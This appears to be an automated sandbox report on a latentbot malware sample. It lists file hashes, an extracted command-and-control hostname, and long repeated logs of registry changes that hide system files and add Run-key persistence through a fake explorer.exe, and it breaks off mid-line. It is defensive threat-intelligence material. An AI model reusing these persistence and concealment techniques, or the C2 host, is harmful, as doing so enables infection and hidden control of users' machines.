Analysis
-
max time kernel
18s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20250410-en -
resource tags
arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system -
submitted
20/04/2025, 05:30
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe
Resource
win10v2004-20250410-en
Behavioral task
behavioral2
Sample
JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe
Resource
win11-20250410-en
General
-
Target
JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe
-
Size
48KB
-
MD5
c4ad493a6bfd212c4e1418ba605020af
-
SHA1
20272ac81bd1df68603924ae3b1fe4c2df034a29
-
SHA256
492bd918e98e5802cf1ff5d3f0537567a7657477fff9cb5e7657448f64ead496
-
SHA512
736487e85b4986284139599befb69a3483108c6199e6737524aafad9daa8614e67ab244859d71affacbcebba8e07af91fb2c4c10484f7988fa7dacd51897ccaf
-
SSDEEP
768:/evN/sOhfTEr9IioMKMevN/sOhfTEr9IioMKa:/elEOhrkIwKMelEOhrkIwKa
Malware Config
Extracted
latentbot
superwaffles.zapto.org
Signatures
-
Latentbot family
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe -
Executes dropped EXE 64 IoCs
pid Process 4700 explorer.exe 3748 explorer.exe 4100 explorer.exe 512 explorer.exe 3052 explorer.exe 1412 explorer.exe 100 explorer.exe 1948 explorer.exe 1016 explorer.exe 4204 explorer.exe 1108 explorer.exe 5044 explorer.exe 3408 explorer.exe 3620 explorer.exe 1544 explorer.exe 1828 explorer.exe 1436 explorer.exe 4520 explorer.exe 3192 explorer.exe 3988 explorer.exe 968 explorer.exe 2960 explorer.exe 3864 explorer.exe 1916 explorer.exe 64 explorer.exe 2432 explorer.exe 440 explorer.exe 4144 explorer.exe 4596 explorer.exe 3440 explorer.exe 3960 explorer.exe 1432 explorer.exe 1544 explorer.exe 4992 explorer.exe 4952 explorer.exe 620 explorer.exe 408 explorer.exe 4448 explorer.exe 2416 explorer.exe 768 explorer.exe 3344 explorer.exe 3536 explorer.exe 4992 explorer.exe 1180 explorer.exe 3852 explorer.exe 1288 explorer.exe 2828 explorer.exe 636 explorer.exe 4452 explorer.exe 4048 explorer.exe 2692 explorer.exe 5112 explorer.exe 3680 explorer.exe 2244 explorer.exe 2996 explorer.exe 3408 explorer.exe 1952 explorer.exe 2072 explorer.exe 3812 explorer.exe 4968 explorer.exe 2136 explorer.exe 4932 explorer.exe 440 explorer.exe 3632 explorer.exe -
Adds Run key to start application 2 TTPs 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3833542908-3750648139-3436651901-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer.exe = 